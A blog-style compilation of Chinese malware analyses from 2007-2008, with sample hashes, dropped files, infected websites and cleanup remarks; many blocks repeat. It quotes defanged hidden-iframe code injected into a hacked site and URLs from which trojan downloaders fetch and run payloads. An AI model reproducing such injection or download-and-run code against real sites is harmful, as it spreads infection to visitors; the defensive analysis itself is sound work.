对某些病毒的分析处理和清除方法
请大家注意国庆期间防范病毒安全问题,最近恶意导航网站有卷土重来之势,多台电脑被3929.cn和go2000.com困扰,中此类病毒的用户多是上网经验不足导致:想畅游互联网又不知道网址,结果被恶意网站钻了空子.根据目前掌握情况分析:深度系统中go2000.com几率大一些(希望不是巧合)由于病毒使用了自我独占保护方式,常规手段并不能彻底清除,个人用户手动清理有些麻烦,我手中的样本已经提交各大杀毒公司,估计很快会有结果
下午16:30分突然有兴致给大家做博客友情链接,先是访问了某人的域名:*.sealx.*,结果大失所望,不过有一个惊喜:他的博客被人挂病毒了.是最近比较流行的Flash漏洞之一的ORZ,这是我抓到的第二个版本,比之前的大了4K,达到20K,因为是相对比较老的病毒其他分析略
File: orz2.exe
Size: 20897 bytes
Modified: 2008年7月13日, 17:04:14
MD5: D0708FEC72B9696B1B862FCA842D9C3C
SHA1: 6FBD16D3E0D89143E0A8A431C0EFEAF5D5A2E7E4
CRC32: 14A4CA50
Shell:NsPacK V3.7
运行后创建文件
c:\mahtesf3.bat 128 bytes 0xD31C0557638F79C6BEC32A6918688900
替换%System%\explorer.exe 1,032,192 bytes 0xA0732187050030AE399B241436565E64
%Windir%\fvca.exe
Size: 20897 bytes
Modified: 2008年7月13日, 17:04:14
MD5: D0708FEC72B9696B1B862FCA842D9C3C
SHA1: 6FBD16D3E0D89143E0A8A431C0EFEAF5D5A2E7E4
CRC32: 14A4CA50
Shell:NsPacK V3.7
运行后创建文件
c:\mahtesf3.bat 128 bytes 0xD31C0557638F79C6BEC32A6918688900
替换%System%\explorer.exe 1,032,192 bytes 0xA0732187050030AE399B241436565E64
%Windir%\fvca.exe
刚才通过baidu找DJ的MP3发现的,利用漏洞内嵌在页面中(我机器从来不打补丁,so可以轻松捉到),目前全球大概只有6款杀软可以查杀,包括启发
File: ntuser.com
Size: 4608 bytes
Modified: 2008年6月13日, 19:47:26
MD5: 0BCB2187B2E0EDCF88EC0CACFFF15E05
SHA1: D4B353DB74676F10B85A7E7D721D0F2E18A01C31
CRC32: 1B393C39
File: ntuser.com
Size: 4608 bytes
Modified: 2008年6月13日, 19:47:26
MD5: 0BCB2187B2E0EDCF88EC0CACFFF15E05
SHA1: D4B353DB74676F10B85A7E7D721D0F2E18A01C31
CRC32: 1B393C39
最近因为要给一些手头的照片批量重命名整理一下,以前一直用拖把更名,我承认这软件写的好,简单易用,界面也好,但是我只用更名功能,感觉浪费严重,虽然我一直用自己做的精简版.所以打算找一个功能简单的软件来代替它,下午没事情干的时候在寻找相关软件信息并一一对比测试,最后并无满意.刚在JM的群内聊天讨论到最近一个新病毒变种感染文件的名字时,我也随手打了个文件名字,顺便无意看了眼C盘根目录,不看不知道,一看汗就下来了
第一次发现了非本人建立的奇怪目录:真相快递[创建时间2008年5月9日, 13:29:57]本人机器一直守卫森严,今天居然有小贼进入,肯定是下午试用软件弄进来的,翻开回收站,找到了源头
第一次发现了非本人建立的奇怪目录:真相快递[创建时间2008年5月9日, 13:29:57]本人机器一直守卫森严,今天居然有小贼进入,肯定是下午试用软件弄进来的,翻开回收站,找到了源头
嘿嘿,貌似NOD传说很强悍啊,连续通过VB100%但终究还是逃脱不了很俗的那话:强中自有强中手.08-04-08,14:05我在例行互联网行走过程中无意访问http://www.nod32cn.com/html/19/91发现此页面被挂病毒.不知是机房ARP还是被入侵,已经联系相关人员解决中(14:40已经解决)分析如下
最近连续几天处理机器经常碰见这个文件,看了有点不爽,于是抓时间没事简单分析一下,不是什么厉害的东东
File: dodolook.exe
Size: 165369 bytes
MD5: 6B1A8B7922FF015A0A2DBA8871BFD91F
SHA1: 2966AA8230CA251860AF906B4110BB92B0CA68A0
CRC32: D52344DD
Shell:NSIS V2.1X
Size: 165369 bytes
MD5: 6B1A8B7922FF015A0A2DBA8871BFD91F
SHA1: 2966AA8230CA251860AF906B4110BB92B0CA68A0
CRC32: D52344DD
Shell:NSIS V2.1X
File: INFO.EXE
Size: 189692 bytes
File Version: 3.608.0433
Modified: 2008年3月27日, 14:50:14
MD5: F2D9E278BFCA9E93578A8EA9536DA93A
SHA1: CF4F2E03673413C8203566EA255411B4B5230B9B
CRC32: 63F8FE2B
Size: 189692 bytes
File Version: 3.608.0433
Modified: 2008年3月27日, 14:50:14
MD5: F2D9E278BFCA9E93578A8EA9536DA93A
SHA1: CF4F2E03673413C8203566EA255411B4B5230B9B
CRC32: 63F8FE2B
有点上瘾,我总是这样,一阵上瘾起来就没完
这个是08-02-29的磁碟机样本,最近蛮流行的东东,距现在来算应该相当古老,无聊分析一下,但是性质一样,样本够BT
这个是08-02-29的磁碟机样本,最近蛮流行的东东,距现在来算应该相当古老,无聊分析一下,但是性质一样,样本够BTFile: pagefile.pif
Size: 93696 bytes
Modified: 2008年2月29日, 22:11:10
MD5: 425C04014B084D762BBCA217277643F0
SHA1: 490540C6D0485E61AD9AA1E798D8FB332E2262E5
CRC32: DC9C2889
Shell:UPX
Size: 93696 bytes
Modified: 2008年2月29日, 22:11:10
MD5: 425C04014B084D762BBCA217277643F0
SHA1: 490540C6D0485E61AD9AA1E798D8FB332E2262E5
CRC32: DC9C2889
Shell:UPX
File: swchost.exe
Size: 51505 bytes
Modified: 2000年11月6日, 17:45:34
MD5: AE8DA6166CA8A5323F77AD165978A721
SHA1: 3AAE618601E4B1ADBA27161CA45589B26687B077
CRC32: 37C8F33A
Shell:ASPack 2.12
Size: 51505 bytes
Modified: 2000年11月6日, 17:45:34
MD5: AE8DA6166CA8A5323F77AD165978A721
SHA1: 3AAE618601E4B1ADBA27161CA45589B26687B077
CRC32: 37C8F33A
Shell:ASPack 2.12
File: interne.exe
Size: 4584 bytes
Modified: 2006年12月14日, 14:29:30
MD5: EDA9A2A69037D8EA016D79B1E5180F1A
SHA1: B4F642E0E1A39AA82808B57950B8C05465FA4230
CRC32: D1952A58
Shell:FSG 2.0
Size: 4584 bytes
Modified: 2006年12月14日, 14:29:30
MD5: EDA9A2A69037D8EA016D79B1E5180F1A
SHA1: B4F642E0E1A39AA82808B57950B8C05465FA4230
CRC32: D1952A58
Shell:FSG 2.0
引用
后台运行并下载h*p://zhifufacai.cn/wwwroot/crr.exe
自从偶的Virtual machine坏了后懒的重装也就很少去分析了,平时只是收集和测试样本而已,今无意在某群中发现一个好东东,随解决我心头之痒
用今天上午抓的昨天产新鸽子来做试验,好戏来了
用今天上午抓的昨天产新鸽子来做试验,好戏来了File: 360Safe.exe
Size: 305664 bytes
Modified: 2008年3月14日, 16:47:38
MD5: 2452434E6B009BC27F51D7F8FEC1CD1A
SHA1: C73F3645C1AFC96F73A8942C7F9628D0DEBAB3D6
CRC32: B1B5BE0C
Shell:N/A
Size: 305664 bytes
Modified: 2008年3月14日, 16:47:38
MD5: 2452434E6B009BC27F51D7F8FEC1CD1A
SHA1: C73F3645C1AFC96F73A8942C7F9628D0DEBAB3D6
CRC32: B1B5BE0C
Shell:N/A
2007-01-27,20:30无意访问悠嘻猴官方网站h*p://www.yoyocici.com发现其网站首页被挂病毒,不排除机房ARP攻击或者被入侵可能,建议大家近期不要访问,如果您已经访问了请及时升级杀毒软件进行全盘查杀.我已经联系该网站管理员,等待他们反馈.查看代码发现顶部被插入
具体内容为
手动下载3个病毒网页,内容都是加密的,找朋友LittleG解密,结果如下:
<ifr* src=h*p://sina8488.com/admin/a92.htm width=20 height=0 frameborder=0></ifr*>
具体内容为
<html>
<ifr* src=h*p://sina8488.com/admin/001.htm width=100 height=0></ifr*>
<ifr* src=h*p://sina8488.com/admin/002.htm width=100 height=0></ifr*>
<ifr* src=h*p://sina8488.com/admin/003.htm width=100 height=0></ifr*>
<html>
<scr* src='h*p://s29.cnzz.com/stat.php?id=755881&web_id=755881' language='JavaScr*' charset='gb2312'></sc*>
<ifr* src=h*p://sina8488.com/admin/001.htm width=100 height=0></ifr*>
<ifr* src=h*p://sina8488.com/admin/002.htm width=100 height=0></ifr*>
<ifr* src=h*p://sina8488.com/admin/003.htm width=100 height=0></ifr*>
<html>
<scr* src='h*p://s29.cnzz.com/stat.php?id=755881&web_id=755881' language='JavaScr*' charset='gb2312'></sc*>
手动下载3个病毒网页,内容都是加密的,找朋友LittleG解密,结果如下:
引用
001是06014漏洞;002是real漏洞;003是联众漏洞
h*p://baidu1633.com/admin/xx.exe[/PE_Patch/UPack]
File: xx.exe
Size: 13667 bytes
MD5: 9FDFEEF049C81D2716AEFD8FD1E50CDB
SHA1: 6C1333F7783818DA9B43DB3A2C795C184691D3B5
CRC32: 9CCE33A4
VirName:Trojan-Downloader.Win32.Agent.hub
h*p://baidu1633.com/admin/xx.exe[/PE_Patch/UPack]
File: xx.exe
Size: 13667 bytes
MD5: 9FDFEEF049C81D2716AEFD8FD1E50CDB
SHA1: 6C1333F7783818DA9B43DB3A2C795C184691D3B5
CRC32: 9CCE33A4
VirName:Trojan-Downloader.Win32.Agent.hub
在7天之内连续3次碰见同样网站,同样病毒,好在被拦截下来没有发作,网络裸奔似乎不安全了.但是同时其他地区的朋友访问却没事,页面再次刷新后恢复正常没有任何中毒迹象.baidu没有任何结果,通过google发现蛛丝马迹,目前反映不是很强烈,该域名注册于易名中国机房位于河南省巩义市网通,其中反映较多的是hxxp://999.dywoyk88.cn上的most.exe,其他的sys170和sys17等变种目前很少有认的,我已经分析后上报.根据分析目前初步排除网页被挂马嫌疑,其他有待确认,网通上次劫持我这里也有过介绍,这次怀疑还是劫持,只不过被转移到了带毒平台,如果事件属实,那么网通
29
Aug
清理硬盘上部分病毒样本2007[07-08][附写真] 
貌似最近一直被相机+照片和其他事情包围了,很久没有整理丢在硬盘角落的样本了,今天心情不错闲来无事整理了一下,包括AV终结者和其生成器;番茄花园病毒;模仿skype和wow盗号等
开始放假了,病毒也开始泛滥了,估计每天出现的速度要比以前多很多,在此提醒大家杀软勤升级,浏览各种网站注意机器自身安全.最近几天连续清理2台机器的病毒,症状如下
今天下午整理了硬盘上面的所有图片,把他们分类归好.连同更新相册.晚上顺便清理病毒样本释放部分无用空间,突然发现病毒数量和感染手段成正比,没有下降反而提高了
最近一直在发"色"毒,荒废了这个方向,想全面发展不容易,还真顾不过来.刚来整理照片的时候发现的.不看不知道,一看吓一跳,又是N多毒和附属品,同样全球杀软没有报全的,现在已经上报瑞星等,金山那个LJ系统我上不去,看各位的命吧,注意图中的DRWTSM32属于文件映象劫持,普通清理后重启开机无法进入桌面
刚浏览安全网站发现一个工具可以利用163邮箱传输包含恶意代码的邮件,然后导致下载木马并运行!目前黑客网站已经出现此漏洞的利用工具,请大家请谨慎对待不明邮件,这年头没有什么安全的地方了
一个非常不好的消息要告诉大家,利用微软动画光标漏洞的新蠕虫已经现身我们收到了相关的样本,通过分析,我们已经确认这是一个复合型蠕虫,含有类似熊猫烧香的感染功能、下载其他病毒的功能、发送含有最新.ani漏洞网址邮件的功能、感染html等文件并向这些文件里添加含有最新漏洞网址的功能
关于灰鸽子木马的好与坏,是与非我不想多做讨论.至于爆发没爆发我也不想去验证,反正我手里的机器已经出现了2007的痕迹,它在我这里也算是病毒的.今天要说的就是教大家如何初步的防范一下
